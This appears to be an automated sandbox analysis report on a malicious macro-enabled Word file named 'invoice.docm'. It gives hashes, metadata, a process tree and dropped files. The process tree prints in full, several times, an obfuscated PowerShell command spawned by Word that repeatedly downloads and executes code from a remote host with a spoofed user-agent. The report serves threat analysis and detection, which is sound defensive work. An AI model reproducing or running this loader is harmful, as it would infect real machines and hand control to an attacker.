File name: | invoice.docm |
---|---|
Full analysis: | https://app.any.run/tasks/d98f07ad-1462-47d9-99e7-750bcae2dd0a |
Verdict: | Malicious activity |
Analysis date: | September 11, 2019, 09:21:45 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/vnd.openxmlformats-officedocument.wordprocessingml.document |
File info: | Microsoft Word 2007+ |
MD5: | D5AC8BFEDEEE7C2940BA1114270C6D75 |
SHA1: | BE53956D96F256B9B1BDF06B90751C4F89FD7AAB |
SHA256: | F33DA2F50C57D73A91119DA1FA5761D63B1F29B28CC7BBA5611838E85B6BB558 |
SSDEEP: | 3072:1OQRJBV94DV6bTd7vDYsEah2+n3udy/QH:tJBVCCRTDYsVh2Or/o |
.docm | | | Word Microsoft Office Open XML Format document (with Macro) (53.6) |
---|---|---|
.docx | | | Word Microsoft Office Open XML Format document (24.2) |
.zip | | | Open Packaging Conventions container (18) |
.zip | | | ZIP compressed archive (4.1) |
AppVersion: | 16 |
---|---|
HyperlinksChanged: | No |
SharedDoc: | No |
CharactersWithSpaces: | 1 |
LinksUpToDate: | No |
Company: | - |
ScaleCrop: | No |
Paragraphs: | 1 |
Lines: | 1 |
DocSecurity: | None |
Application: | Microsoft Office Word |
Characters: | 1 |
Words: | - |
Pages: | 1 |
TotalEditTime: | - |
Template: | Normal.dotm |
ModifyDate: | 2019:04:29 07:08:00Z |
CreateDate: | 2019:04:29 06:54:00Z |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Keywords: | - |
Description: | - |
---|---|
Creator: | - |
Subject: | - |
Title: | - |
ZipFileName: | [Content_Types].xml |
---|---|
ZipUncompressedSize: | 1900 |
ZipCompressedSize: | 436 |
ZipCRC: | 0x928413df |
ZipModifyDate: | 1980:01:01 00:00:00 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0006 |
ZipRequiredVersion: | 20 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2892 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\invoice.docm" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2200 | C:\winDOWS\sYstEm32\CmD /c poWERsHELL " &((gv '*mdr*').nAMe[3,11,2]-joIn'') (('tpIthese = FjLareFjL;tpIare = ne'+'w-obje'+'ct System.Net.WebClient;tpItoken=(FjL{7}{6}{5}{0}{3}{1}{4}{2'+'}FjL-fnRfbecnRf,nRf3nRf,nRf9nRf,nRf1nRf,nRf8365nRf,nRf407b-a7d9-0dnRf,nRf5e-a512-nRf,nRf3f33f5nRf);tpIuseless = 443;tpIvariables=(FjL{1}{3}{0}{2}FjL-f nRfe/lonRf,nRf'+'googlenRf,'+'nRfginnRf,nRf.dnRf);tpIUserAgent = ((FjL{8}{10}{4}{1'+'}{11'+'}{6}{12}{16}{7}{13'+'}{14}{5}'+'{9}{0}{3}{2}{15}FjL -f nRfo/20100'+'101'+' FirefnRf,nRf5.0nRf,nRf/60.nRf,nR'+'foxnRf,nRfla/nRf'+',nR'+'f.'+'0) nRf,nRfows NT 10.nRf,nRf64; rvnRf,nRfMozinRf,nRfGecknRf,nRflnRf,nRf (WindnRf,nRf0; Win6nRf,nRf:nRf,nRf60nRf,nRf0nRf,nRf4; xnRf));tpIidentifier = (1..20 5UE %{ nRf{0:X}nRf -f (Get-Ra'+'ndom -Max 16) }) -join nRfnRf;while(tpItrue){ . { tpIWcl = new-object System.Net.WebClient; tpIuse'+'less++; tpIWcl.H'+'eaders.Add((FjL{1}{0}{2}FjL-f nRfnnRf,nRfuser'+'-agenRf,nRftnR'+'f), tpIUserAgent); tp'+'IWcl.Headers.Add((F'+'jL{0}{2}{1}FjL -f nR'+'fIdenRf,nRfifiernRf,nRfntnRf), tpIidentifier); tpIWcl.Proxy.Credentials = [System.N'+'et.CredentialCache]::DefaultNetworkCredentials; tpIua=tpIu'+'seragent.ToCharArray();[array]::Reverse(tp'+'Iua);tpIurI=(FjL{2}{1}{0}FjL-fnRf//nRf,nRfp:nRf,nRfhttnRf)+(FjL{3}{2}{1}{0}FjL -fnRf.48nRf,nRf.11nRf,nRf3.95nRf,nRf1nRf)+(FjL{2}{1}{'+'0}FjL -f '+'nRfrmnRf,nRfonRf,n'+'Rf/artnRf); tpIUsreAgent=-join(tpIua); tpIurl=(FjL{1}{0}{2}FjL-fnRfttp:/nRf,nRfhnRf,nRf/nRf)+(F'+'jL{1}{2}{0}FjL -fnRf.11.48nRf,nRf13.nRf,nRf95nRf)+(FjL{1}{0}FjL -fnRfrmnR'+'f,nRf/aartonRf); iwr -Uri tpIurl -UserAgent tpIUsreAgent -Headers @{(FjL{1}{0}{2}FjL-f nRfdenRf,nRfInRf,nRfntifiernRf) = tpIidentifier} 5UE iex;}}').RePLace(([ChaR]53+[ChaR]85+[ChaR]69),'|').RePLace(([ChaR]70+[ChaR]106+[ChaR]76),[StRIng][ChaR]34).RePLace(([ChaR]116+[ChaR]112+[ChaR]73),[StRIng][ChaR]36).RePLace('nRf',[StRIng][ChaR]39) )" | C:\winDOWS\sYstEm32\CmD.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2904 | poWERsHELL " &((gv '*mdr*').nAMe[3,11,2]-joIn'') (('tpIthese = FjLareFjL;tpIare = ne'+'w-obje'+'ct System.Net.WebClient;tpItoken=(FjL{7}{6}{5}{0}{3}{1}{4}{2'+'}FjL-fnRfbecnRf,nRf3nRf,nRf9nRf,nRf1nRf,nRf8365nRf,nRf407b-a7d9-0dnRf,nRf5e-a512-nRf,nRf3f33f5nRf);tpIuseless = 443;tpIvariables=(FjL{1}{3}{0}{2}FjL-f nRfe/lonRf,nRf'+'googlenRf,'+'nRfginnRf,nRf.dnRf);tpIUserAgent = ((FjL{8}{10}{4}{1'+'}{11'+'}{6}{12}{16}{7}{13'+'}{14}{5}'+'{9}{0}{3}{2}{15}FjL -f nRfo/20100'+'101'+' FirefnRf,nRf5.0nRf,nRf/60.nRf,nR'+'foxnRf,nRfla/nRf'+',nR'+'f.'+'0) nRf,nRfows NT 10.nRf,nRf64; rvnRf,nRfMozinRf,nRfGecknRf,nRflnRf,nRf (WindnRf,nRf0; Win6nRf,nRf:nRf,nRf60nRf,nRf0nRf,nRf4; xnRf));tpIidentifier = (1..20 5UE %{ nRf{0:X}nRf -f (Get-Ra'+'ndom -Max 16) }) -join nRfnRf;while(tpItrue){ . { tpIWcl = new-object System.Net.WebClient; tpIuse'+'less++; tpIWcl.H'+'eaders.Add((FjL{1}{0}{2}FjL-f nRfnnRf,nRfuser'+'-agenRf,nRftnR'+'f), tpIUserAgent); tp'+'IWcl.Headers.Add((F'+'jL{0}{2}{1}FjL -f nR'+'fIdenRf,nRfifiernRf,nRfntnRf), tpIidentifier); tpIWcl.Proxy.Credentials = [System.N'+'et.CredentialCache]::DefaultNetworkCredentials; tpIua=tpIu'+'seragent.ToCharArray();[array]::Reverse(tp'+'Iua);tpIurI=(FjL{2}{1}{0}FjL-fnRf//nRf,nRfp:nRf,nRfhttnRf)+(FjL{3}{2}{1}{0}FjL -fnRf.48nRf,nRf.11nRf,nRf3.95nRf,nRf1nRf)+(FjL{2}{1}{'+'0}FjL -f '+'nRfrmnRf,nRfonRf,n'+'Rf/artnRf); tpIUsreAgent=-join(tpIua); tpIurl=(FjL{1}{0}{2}FjL-fnRfttp:/nRf,nRfhnRf,nRf/nRf)+(F'+'jL{1}{2}{0}FjL -fnRf.11.48nRf,nRf13.nRf,nRf95nRf)+(FjL{1}{0}FjL -fnRfrmnR'+'f,nRf/aartonRf); iwr -Uri tpIurl -UserAgent tpIUsreAgent -Headers @{(FjL{1}{0}{2}FjL-f nRfdenRf,nRfInRf,nRfntifiernRf) = tpIidentifier} 5UE iex;}}').RePLace(([ChaR]53+[ChaR]85+[ChaR]69),'|').RePLace(([ChaR]70+[ChaR]106+[ChaR]76),[StRIng][ChaR]34).RePLace(([ChaR]116+[ChaR]112+[ChaR]73),[StRIng][ChaR]36).RePLace('nRf',[StRIng][ChaR]39) )" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | CmD.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2960 | C:\winDOWS\sYstEm32\CmD /c poWERsHELL " &((gv '*mdr*').nAMe[3,11,2]-joIn'') (('tpIthese = FjLareFjL;tpIare = ne'+'w-obje'+'ct System.Net.WebClient;tpItoken=(FjL{7}{6}{5}{0}{3}{1}{4}{2'+'}FjL-fnRfbecnRf,nRf3nRf,nRf9nRf,nRf1nRf,nRf8365nRf,nRf407b-a7d9-0dnRf,nRf5e-a512-nRf,nRf3f33f5nRf);tpIuseless = 443;tpIvariables=(FjL{1}{3}{0}{2}FjL-f nRfe/lonRf,nRf'+'googlenRf,'+'nRfginnRf,nRf.dnRf);tpIUserAgent = ((FjL{8}{10}{4}{1'+'}{11'+'}{6}{12}{16}{7}{13'+'}{14}{5}'+'{9}{0}{3}{2}{15}FjL -f nRfo/20100'+'101'+' FirefnRf,nRf5.0nRf,nRf/60.nRf,nR'+'foxnRf,nRfla/nRf'+',nR'+'f.'+'0) nRf,nRfows NT 10.nRf,nRf64; rvnRf,nRfMozinRf,nRfGecknRf,nRflnRf,nRf (WindnRf,nRf0; Win6nRf,nRf:nRf,nRf60nRf,nRf0nRf,nRf4; xnRf));tpIidentifier = (1..20 5UE %{ nRf{0:X}nRf -f (Get-Ra'+'ndom -Max 16) }) -join nRfnRf;while(tpItrue){ . { tpIWcl = new-object System.Net.WebClient; tpIuse'+'less++; tpIWcl.H'+'eaders.Add((FjL{1}{0}{2}FjL-f nRfnnRf,nRfuser'+'-agenRf,nRftnR'+'f), tpIUserAgent); tp'+'IWcl.Headers.Add((F'+'jL{0}{2}{1}FjL -f nR'+'fIdenRf,nRfifiernRf,nRfntnRf), tpIidentifier); tpIWcl.Proxy.Credentials = [System.N'+'et.CredentialCache]::DefaultNetworkCredentials; tpIua=tpIu'+'seragent.ToCharArray();[array]::Reverse(tp'+'Iua);tpIurI=(FjL{2}{1}{0}FjL-fnRf//nRf,nRfp:nRf,nRfhttnRf)+(FjL{3}{2}{1}{0}FjL -fnRf.48nRf,nRf.11nRf,nRf3.95nRf,nRf1nRf)+(FjL{2}{1}{'+'0}FjL -f '+'nRfrmnRf,nRfonRf,n'+'Rf/artnRf); tpIUsreAgent=-join(tpIua); tpIurl=(FjL{1}{0}{2}FjL-fnRfttp:/nRf,nRfhnRf,nRf/nRf)+(F'+'jL{1}{2}{0}FjL -fnRf.11.48nRf,nRf13.nRf,nRf95nRf)+(FjL{1}{0}FjL -fnRfrmnR'+'f,nRf/aartonRf); iwr -Uri tpIurl -UserAgent tpIUsreAgent -Headers @{(FjL{1}{0}{2}FjL-f nRfdenRf,nRfInRf,nRfntifiernRf) = tpIidentifier} 5UE iex;}}').RePLace(([ChaR]53+[ChaR]85+[ChaR]69),'|').RePLace(([ChaR]70+[ChaR]106+[ChaR]76),[StRIng][ChaR]34).RePLace(([ChaR]116+[ChaR]112+[ChaR]73),[StRIng][ChaR]36).RePLace('nRf',[StRIng][ChaR]39) )" | C:\winDOWS\sYstEm32\CmD.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3416 | poWERsHELL " &((gv '*mdr*').nAMe[3,11,2]-joIn'') (('tpIthese = FjLareFjL;tpIare = ne'+'w-obje'+'ct System.Net.WebClient;tpItoken=(FjL{7}{6}{5}{0}{3}{1}{4}{2'+'}FjL-fnRfbecnRf,nRf3nRf,nRf9nRf,nRf1nRf,nRf8365nRf,nRf407b-a7d9-0dnRf,nRf5e-a512-nRf,nRf3f33f5nRf);tpIuseless = 443;tpIvariables=(FjL{1}{3}{0}{2}FjL-f nRfe/lonRf,nRf'+'googlenRf,'+'nRfginnRf,nRf.dnRf);tpIUserAgent = ((FjL{8}{10}{4}{1'+'}{11'+'}{6}{12}{16}{7}{13'+'}{14}{5}'+'{9}{0}{3}{2}{15}FjL -f nRfo/20100'+'101'+' FirefnRf,nRf5.0nRf,nRf/60.nRf,nR'+'foxnRf,nRfla/nRf'+',nR'+'f.'+'0) nRf,nRfows NT 10.nRf,nRf64; rvnRf,nRfMozinRf,nRfGecknRf,nRflnRf,nRf (WindnRf,nRf0; Win6nRf,nRf:nRf,nRf60nRf,nRf0nRf,nRf4; xnRf));tpIidentifier = (1..20 5UE %{ nRf{0:X}nRf -f (Get-Ra'+'ndom -Max 16) }) -join nRfnRf;while(tpItrue){ . { tpIWcl = new-object System.Net.WebClient; tpIuse'+'less++; tpIWcl.H'+'eaders.Add((FjL{1}{0}{2}FjL-f nRfnnRf,nRfuser'+'-agenRf,nRftnR'+'f), tpIUserAgent); tp'+'IWcl.Headers.Add((F'+'jL{0}{2}{1}FjL -f nR'+'fIdenRf,nRfifiernRf,nRfntnRf), tpIidentifier); tpIWcl.Proxy.Credentials = [System.N'+'et.CredentialCache]::DefaultNetworkCredentials; tpIua=tpIu'+'seragent.ToCharArray();[array]::Reverse(tp'+'Iua);tpIurI=(FjL{2}{1}{0}FjL-fnRf//nRf,nRfp:nRf,nRfhttnRf)+(FjL{3}{2}{1}{0}FjL -fnRf.48nRf,nRf.11nRf,nRf3.95nRf,nRf1nRf)+(FjL{2}{1}{'+'0}FjL -f '+'nRfrmnRf,nRfonRf,n'+'Rf/artnRf); tpIUsreAgent=-join(tpIua); tpIurl=(FjL{1}{0}{2}FjL-fnRfttp:/nRf,nRfhnRf,nRf/nRf)+(F'+'jL{1}{2}{0}FjL -fnRf.11.48nRf,nRf13.nRf,nRf95nRf)+(FjL{1}{0}FjL -fnRfrmnR'+'f,nRf/aartonRf); iwr -Uri tpIurl -UserAgent tpIUsreAgent -Headers @{(FjL{1}{0}{2}FjL-f nRfdenRf,nRfInRf,nRfntifiernRf) = tpIidentifier} 5UE iex;}}').RePLace(([ChaR]53+[ChaR]85+[ChaR]69),'|').RePLace(([ChaR]70+[ChaR]106+[ChaR]76),[StRIng][ChaR]34).RePLace(([ChaR]116+[ChaR]112+[ChaR]73),[StRIng][ChaR]36).RePLace('nRf',[StRIng][ChaR]39) )" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | CmD.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
2892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9CF0.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\mso9F33.tmp | — | |
MD5:— | SHA256:— | |||
2904 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\IH0SZXEVCBGMV7UKITE8.temp | — | |
MD5:— | SHA256:— | |||
3416 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\779ITIM4R5ULLNCQ8DBJ.temp | — | |
MD5:— | SHA256:— | |||
3416 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF174ecc.TMP | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2904 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF16a56c.TMP | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
3416 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2904 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:0F2CAD9746414ABA31294C3B560FCFD5 | SHA256:19AD383DED364BB44DED7C7CF00EB6254E5E98D696632944F6BC36724306EE15 | |||
2892 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$nvoice.docm | pgc | |
MD5:67C48A54096B88298F1DF93035B3C987 | SHA256:F5E6D1681DB0A49F6EDCA502D5F0B78FCC8950BA39D87D9A76EEAF75A9C06030 | |||
2892 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:62F2DA178DD59EBA6B61EE250E55F925 | SHA256:8CF938206B83D51659082A32A71F3A9F077217F5A2E07A98541350C60245A244 | |||